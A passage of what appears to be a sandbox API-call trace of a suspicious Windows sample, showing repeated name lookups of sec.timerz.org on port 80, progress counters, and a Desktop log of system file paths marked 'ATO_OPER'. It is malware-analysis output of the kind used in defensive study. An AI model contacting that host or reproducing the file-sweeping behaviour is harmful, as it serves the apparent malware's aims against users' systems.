CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="sec.timerz.org", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0058.145] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="sec.timerz.org", cchWideChar=14, lpMultiByteStr=0x1f731cc, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sec.timerz.org", lpUsedDefaultChar=0x0) returned 14 [0058.145] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x1fc1d7c, cbMultiByte=20, lpWideCharStr=0x259ed38, cchWideChar=2047 | out: lpWideCharStr="Host: sec.timerz.org") returned 20 [0058.145] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0058.145] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x1f7a84c, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="80", lpUsedDefaultChar=0x0) returned 2 [0058.145] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="sec.timerz.org", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0058.145] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="sec.timerz.org", cchWideChar=14, lpMultiByteStr=0x1f7316c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sec.timerz.org", lpUsedDefaultChar=0x0) returned 14 [0058.145] getaddrinfo (pNodeName="sec.timerz.org", pServiceName="80", pHints=0x259fb8c*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x259fbac) Thread: id = 8 os_tid = 0x57c [0060.021] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="sec.timerz.org", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0060.021] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="sec.timerz.org", cchWideChar=14, lpMultiByteStr=0x1f7332c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sec.timerz.org", lpUsedDefaultChar=0x0) returned 14 [0060.021] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x1fc204c, cbMultiByte=20, lpWideCharStr=0x27ded38, cchWideChar=2047 | out: lpWideCharStr="Host: sec.timerz.org") returned 20 [0060.021] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0060.021] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x1f7aa2c, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="80", lpUsedDefaultChar=0x0) returned 2 [0060.021] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="sec.timerz.org", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0060.021] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="sec.timerz.org", cchWideChar=14, lpMultiByteStr=0x1f7330c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sec.timerz.org", lpUsedDefaultChar=0x0) returned 14 [0060.021] getaddrinfo (pNodeName="sec.timerz.org", pServiceName="80", pHints=0x27dfb8c*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x27dfbac) Thread: id = 11 os_tid = 0x83c [0060.234] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=0 / B=0 / T=3858", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0060.234] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=0 / B=0 / T=3858", cchWideChar=35, lpMultiByteStr=0x1fa53c4, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=0 / B=0 / T=3858", lpUsedDefaultChar=0x0) returned 35 [0060.234] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x23, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x23, lpOverlapped=0x0) returned 1 [0060.235] Sleep (dwMilliseconds=0x5dc) [0062.440] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=101 / B=0 / T=3858", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0062.440] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=101 / B=0 / T=3858", cchWideChar=37, lpMultiByteStr=0x1fa53fc, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=101 / B=0 / T=3858", lpUsedDefaultChar=0x0) returned 37 [0062.441] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x25, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x25, lpOverlapped=0x0) returned 1 [0062.441] Sleep (dwMilliseconds=0x5dc) [0065.017] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=184 / B=0 / T=3858", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0065.017] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=184 / B=0 / T=3858", cchWideChar=37, lpMultiByteStr=0x1fa55f4, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=184 / B=0 / T=3858", lpUsedDefaultChar=0x0) returned 37 [0065.017] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x25, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x25, lpOverlapped=0x0) returned 1 [0065.018] Sleep (dwMilliseconds=0x5dc) [0066.627] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=251 / B=0 / T=3858", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0066.628] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=251 / B=0 / T=3858", cchWideChar=37, lpMultiByteStr=0x1fa55f4, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=251 / B=0 / T=3858", lpUsedDefaultChar=0x0) returned 37 [0066.628] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x25, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x25, lpOverlapped=0x0) returned 1 [0066.628] Sleep (dwMilliseconds=0x5dc) [0069.521] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=319 / B=0 / T=3858", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0069.521] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=319 / B=0 / T=3858", cchWideChar=37, lpMultiByteStr=0x1fa53fc, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=319 / B=0 / T=3858", lpUsedDefaultChar=0x0) returned 37 [0069.521] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x25, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x25, lpOverlapped=0x0) returned 1 [0069.521] Sleep (dwMilliseconds=0x5dc) [0071.669] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bad_2660EAA9CA5C3071.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bad_2660eaa9ca5c3071.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0071.670] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\n", cchWideChar=77, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 77 [0071.671] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\n", cchWideChar=77, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 77 [0071.671] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\n", cchWideChar=77, lpMultiByteStr=0x1f9f6a8, cbMultiByte=77, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\n", lpUsedDefaultChar=0x0) returned 77 [0071.671] WriteFile (in: hFile=0x1e8, lpBuffer=0x1f9f6a8*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x2a1fe34, lpOverlapped=0x0 | out: lpBuffer=0x1f9f6a8*, lpNumberOfBytesWritten=0x2a1fe34*=0x4d, lpOverlapped=0x0) returned 1 [0071.672] CloseHandle (hObject=0x1e8) returned 1 [0071.672] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=406 / B=1 / T=3858", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0071.672] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=406 / B=1 / T=3858", cchWideChar=37, lpMultiByteStr=0x1fa54dc, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=406 / B=1 / T=3858", lpUsedDefaultChar=0x0) returned 37 [0071.672] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x25, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x25, lpOverlapped=0x0) returned 1 [0071.673] Sleep (dwMilliseconds=0x5dc) [0075.692] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=541 / B=1 / T=3858", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0075.693] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=541 / B=1 / T=3858", cchWideChar=37, lpMultiByteStr=0x1fa53fc, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=541 / B=1 / T=3858", lpUsedDefaultChar=0x0) returned 37 [0075.699] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x25, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x25, lpOverlapped=0x0) returned 1 [0075.705] Sleep (dwMilliseconds=0x5dc) [0078.012] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=695 / B=1 / T=3858", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0078.012] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=695 / B=1 / T=3858", cchWideChar=37, lpMultiByteStr=0x1fa56d4, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=695 / B=1 / T=3858", lpUsedDefaultChar=0x0) returned 37 [0078.012] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x25, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x25, lpOverlapped=0x0) returned 1 [0078.013] Sleep (dwMilliseconds=0x5dc) [0081.035] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bad_2660EAA9CA5C3071.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bad_2660eaa9ca5c3071.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0081.037] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\n", cchWideChar=147, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 147 [0081.037] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\n", cchWideChar=147, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 147 [0081.038] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\n", cchWideChar=147, lpMultiByteStr=0x1f71a98, cbMultiByte=147, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\n", lpUsedDefaultChar=0x0) returned 147 [0081.038] WriteFile (in: hFile=0x1f8, lpBuffer=0x1f71a98*, nNumberOfBytesToWrite=0x93, lpNumberOfBytesWritten=0x2a1fe34, lpOverlapped=0x0 | out: lpBuffer=0x1f71a98*, lpNumberOfBytesWritten=0x2a1fe34*=0x93, lpOverlapped=0x0) returned 1 [0081.039] CloseHandle (hObject=0x1f8) returned 1 [0081.039] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=803 / B=2 / T=3858", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0081.039] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=803 / B=2 / T=3858", cchWideChar=37, lpMultiByteStr=0x1fa53fc, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=803 / B=2 / T=3858", lpUsedDefaultChar=0x0) returned 37 [0081.039] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x25, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x25, lpOverlapped=0x0) returned 1 [0081.041] Sleep (dwMilliseconds=0x5dc) [0083.053] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=949 / B=2 / T=3858", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0083.053] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=949 / B=2 / T=3858", cchWideChar=37, lpMultiByteStr=0x1fa538c, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=949 / B=2 / T=3858", lpUsedDefaultChar=0x0) returned 37 [0083.053] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x25, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x25, lpOverlapped=0x0) returned 1 [0083.054] Sleep (dwMilliseconds=0x5dc) [0085.213] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=1093 / B=2 / T=3858", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0085.213] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=1093 / B=2 / T=3858", cchWideChar=38, lpMultiByteStr=0x1fa54dc, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=1093 / B=2 / T=3858", lpUsedDefaultChar=0x0) returned 38 [0085.213] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x26, lpOverlapped=0x0) returned 1 [0085.214] Sleep (dwMilliseconds=0x5dc) [0086.872] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=1221 / B=2 / T=3858", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0086.872] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=1221 / B=2 / T=3858", cchWideChar=38, lpMultiByteStr=0x1fa538c, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=1221 / B=2 / T=3858", lpUsedDefaultChar=0x0) returned 38 [0086.872] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x26, lpOverlapped=0x0) returned 1 [0086.873] Sleep (dwMilliseconds=0x5dc) [0089.274] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bad_2660EAA9CA5C3071.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bad_2660eaa9ca5c3071.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0089.278] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\n", cchWideChar=202, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 202 [0089.279] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\n", cchWideChar=202, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 202 [0089.279] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\n", cchWideChar=202, lpMultiByteStr=0x1ed8918, cbMultiByte=202, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nf", lpUsedDefaultChar=0x0) returned 202 [0089.279] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ed8918*, nNumberOfBytesToWrite=0xca, lpNumberOfBytesWritten=0x2a1fe34, lpOverlapped=0x0 | out: lpBuffer=0x1ed8918*, lpNumberOfBytesWritten=0x2a1fe34*=0xca, lpOverlapped=0x0) returned 1 [0089.280] CloseHandle (hObject=0x1f0) returned 1 [0089.280] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=1273 / B=3 / T=3858", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0089.280] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=1273 / B=3 / T=3858", cchWideChar=38, lpMultiByteStr=0x1fa53fc, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=1273 / B=3 / T=3858", lpUsedDefaultChar=0x0) returned 38 [0089.280] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x26, lpOverlapped=0x0) returned 1 [0089.281] Sleep (dwMilliseconds=0x5dc) [0095.699] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=1384 / B=3 / T=3858", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0095.699] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=1384 / B=3 / T=3858", cchWideChar=38, lpMultiByteStr=0x1fa55f4, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=1384 / B=3 / T=3858", lpUsedDefaultChar=0x0) returned 38 [0095.699] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x26, lpOverlapped=0x0) returned 1 [0095.701] Sleep (dwMilliseconds=0x5dc) [0097.779] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=1434 / B=3 / T=3858", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0097.779] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=1434 / B=3 / T=3858", cchWideChar=38, lpMultiByteStr=0x1fa55f4, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=1434 / B=3 / T=3858", lpUsedDefaultChar=0x0) returned 38 [0097.779] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x26, lpOverlapped=0x0) returned 1 [0097.781] Sleep (dwMilliseconds=0x5dc) [0112.628] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bad_2660EAA9CA5C3071.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bad_2660eaa9ca5c3071.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc 